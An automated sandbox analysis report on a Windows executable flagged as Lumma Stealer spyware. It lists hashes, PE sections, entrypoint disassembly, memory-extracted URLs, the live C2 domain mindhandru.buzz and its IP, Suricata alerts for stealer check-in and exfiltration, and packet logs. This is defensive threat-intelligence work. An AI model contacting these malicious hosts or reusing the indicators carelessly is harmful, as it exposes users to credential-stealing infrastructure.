                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://ocsp.rootca1.amazontrust.com0:ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://mindhandru.buzz/oARoqFi68Nr.exe, 00000000.00000002.1598656107.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1597013208.000000000114F000.00000004.00000020.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://mindhandru.buzz/piARoqFi68Nr.exe, 00000000.00000003.1526898890.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1530600303.0000000001151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.ecosia.org/newtab/ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://mindhandru.buzz/piOARoqFi68Nr.exe, 00000000.00000002.1598656107.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1597013208.000000000114F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://mindhandru.buzz/gARoqFi68Nr.exe, 00000000.00000003.1502111690.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501331711.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1505633372.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1475695276.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501151618.000000000567A000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://ac.ecosia.org/autocomplete?q=ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://mindhandru.buzz/K7ARoqFi68Nr.exe, 00000000.00000002.1600312441.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1596881692.0000000005679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://mindhandru.buzz/apizARoqFi68Nr.exe, 00000000.00000003.1596961059.0000000005682000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000002.1600344046.0000000005682000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501151618.000000000567A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://crl.microARoqFi68Nr.exe, 00000000.00000003.1505392610.000000000111F000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1527003067.000000000111D000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1544682245.0000000001120000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1596864489.0000000001128000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://x1.c.lencr.org/0ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://x1.i.lencr.org/0ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://mindhandru.buzz/WARoqFi68Nr.exe, 00000000.00000002.1598656107.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1597013208.000000000114F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://mindhandru.buzz/apiultiARoqFi68Nr.exe, 00000000.00000003.1475695276.0000000005680000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://mindhandru.buzz/piwARoqFi68Nr.exe, 00000000.00000003.1544388931.0000000001151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://support.mozilla.org/products/firefoxgro.allARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.21.11.101
                                                                          		mindhandru.buzzUnited States
                                                                          		13335CLOUDFLARENETUSfalse

                                                                          General Information

                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1581229
                                                                          Start date and time:2024-12-27 08:51:42 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 5m 47s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:7
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:ARoqFi68Nr.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:d867e39681dbe1564bcdd21d773e668b.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                          EGA Information:Failed
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 0
                                                                          • Number of non-executed functions: 0
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target ARoqFi68Nr.exe, PID 7380 because there are no executed function
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          02:52:45API Interceptor8x Sleep call for process: ARoqFi68Nr.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          104.21.11.101DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                            Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                              IERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                                                zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                                                  C8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                                                    0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                                                      cqHMm0ykDG.exeGet hashmaliciousLummaCBrowse
                                                                                        b0ho5YYSdo.exeGet hashmaliciousLummaCBrowse
                                                                                          ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                            0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              mindhandru.buzzIdau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                              • 104.21.11.101
                                                                                              PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.165.185
                                                                                              7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.165.185
                                                                                              IERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.11.101
                                                                                              oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                              • 172.67.165.185
                                                                                              zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.165.185
                                                                                              C8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.11.101
                                                                                              U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.165.185
                                                                                              0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.11.101
                                                                                              cqHMm0ykDG.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.11.101

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              CLOUDFLARENETUSDRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                              • 104.21.11.101
                                                                                              Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                              • 104.21.11.101
                                                                                              PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.165.185
                                                                                              7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.165.185
                                                                                              IERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.11.101
                                                                                              oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                              • 172.67.165.185
                                                                                              zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.11.101
                                                                                              C8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.11.101
                                                                                              U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.165.185
                                                                                              aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                              • 172.64.41.3

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              a0e9f5d64349fb13191bc781f81f42e1Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                              • 104.21.11.101
                                                                                              PH1D3KHmOD.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.11.101
                                                                                              7jKx8dPOEs.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.11.101
                                                                                              IERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.11.101
                                                                                              oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                              • 104.21.11.101
                                                                                              zi042476Iv.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.11.101
                                                                                              C8FtVPhuxd.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.11.101
                                                                                              U7TAniYFeK.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.11.101
                                                                                              8lOT1rXZp5.exeGet hashmaliciousRedLineBrowse
                                                                                              • 104.21.11.101
                                                                                              6wFwugeLNG.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.11.101

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              No created / dropped files found

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):6.5697397837698075
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:ARoqFi68Nr.exe
                                                                                              File size:2'935'296 bytes
                                                                                              MD5:d867e39681dbe1564bcdd21d773e668b
                                                                                              SHA1:c8c855e1ff585fdf76e7bb28001fa025a0b201cb
                                                                                              SHA256:d0003288a5022dd1f2af3d6aaec3236c57163e5884cc24909d9175de96c0d734
                                                                                              SHA512:a0de86b5035e62714d61533882b1de275297e9d617a624b7e39460ae3f563c1c17d3e4fe01ff360b9c3c01ac0db44c9860758230d83c0f1551df143d156d5e6a
                                                                                              SSDEEP:49152:j76vIzjLjYeJMNngheJOhchADRWuNUPcyw2A/coYkrP:juvIzjLjYeJMNnghEOhchsRWuORkP
                                                                                              TLSH:1BD52BD2FD0972CFD4CA26789427CD86A95E06F50B2289D3F86CA5797E63CC221B5C34
                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig............................../...........@.........................../.......,...@.................................Y@..m..

                                                                                              File Icon

                                                                                              Icon Hash:00928e8e8686b000

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x6f9000
                                                                                              Entrypoint Section:.taggant
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:6
                                                                                              OS Version Minor:0
                                                                                              File Version Major:6
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:6
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              jmp 00007F9F090F286Ah
                                                                                              push gs
                                                                                              sub al, 00h
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              jmp 00007F9F090F4865h
                                                                                              add byte ptr [edx], al
                                                                                              or al, byte ptr [eax]
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], dh
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              or byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [ecx], al
                                                                                              add byte ptr [eax], 00000000h
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              adc byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              push es
                                                                                              or al, byte ptr [eax]
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax+0Ah], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              push es
                                                                                              add byte ptr [eax], 00000000h
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              adc byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              push es
                                                                                              or al, byte ptr [eax]
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [edi], cl
                                                                                              or al, byte ptr [eax]
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], cl
                                                                                              add byte ptr [eax], 00000000h
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              adc byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add cl, byte ptr [edx]
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              xor byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              sbb al, 00h
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              pop es
                                                                                              add byte ptr [eax], 00000000h
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              0x10000x520000x264001f7c614c14fbc39ed3754a5c7c7f29deFalse0.9996297998366013data7.981577934195685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc 0x530000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              trvrqxmv0x550000x2a30000x2a2e0065f4a8b620ba5b3361938f80b0132b0cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              fllfikzu0x2f80000x10000x400615bc7e0bf88790d7b1b4b59d812f3edFalse0.80078125data6.283066512732298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .taggant0x2f90000x30000x22009147a3742f39cb35b3c41fbf9a5b8067False0.05330882352941176DOS executable (COM)0.6268345437999209IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                              Imports

                                                                                              DLLImport
                                                                                              kernel32.dlllstrcpy

                                                                                              Network Behavior

                                                                                              Suricata IDS Alerts

                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-12-27T08:52:45.545108+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749700104.21.11.101443TCP
                                                                                              2024-12-27T08:52:46.304703+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749700104.21.11.101443TCP
                                                                                              2024-12-27T08:52:46.304703+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749700104.21.11.101443TCP
                                                                                              2024-12-27T08:52:47.713609+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749702104.21.11.101443TCP
                                                                                              2024-12-27T08:52:48.566284+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749702104.21.11.101443TCP
                                                                                              2024-12-27T08:52:48.566284+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749702104.21.11.101443TCP
                                                                                              2024-12-27T08:52:50.224169+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749703104.21.11.101443TCP
                                                                                              2024-12-27T08:52:51.263028+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749703104.21.11.101443TCP
                                                                                              2024-12-27T08:52:52.705000+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749709104.21.11.101443TCP
                                                                                              2024-12-27T08:53:01.537276+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749733104.21.11.101443TCP
                                                                                              2024-12-27T08:53:04.266975+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749741104.21.11.101443TCP
                                                                                              2024-12-27T08:53:06.862831+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749748104.21.11.101443TCP
                                                                                              2024-12-27T08:53:06.873316+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.749748104.21.11.101443TCP
                                                                                              2024-12-27T08:53:12.098083+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749763104.21.11.101443TCP

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 27, 2024 08:52:44.276346922 CET49700443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:44.276386023 CET44349700104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:44.276467085 CET49700443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:44.279360056 CET49700443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:44.279373884 CET44349700104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:45.545032024 CET44349700104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:45.545108080 CET49700443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:45.548491001 CET49700443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:45.548499107 CET44349700104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:45.548825979 CET44349700104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:45.597809076 CET49700443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:45.602840900 CET49700443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:45.603477955 CET49700443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:45.603521109 CET44349700104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:46.304723024 CET44349700104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:46.304830074 CET44349700104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:46.304908991 CET49700443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:46.344019890 CET49700443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:46.344053030 CET44349700104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:46.499353886 CET49702443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:46.499389887 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:46.499485970 CET49702443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:46.500463963 CET49702443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:46.500475883 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:47.713458061 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:47.713608980 CET49702443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:47.715656996 CET49702443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:47.715665102 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:47.715939999 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:47.717220068 CET49702443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:47.717322111 CET49702443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:47.717339039 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.566292048 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.566360950 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.566392899 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.566425085 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.566452980 CET49702443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:48.566456079 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.566483021 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.566519976 CET49702443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:48.566531897 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.566565037 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.566595078 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.566603899 CET49702443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:48.566603899 CET49702443192.168.2.7104.21.11.101
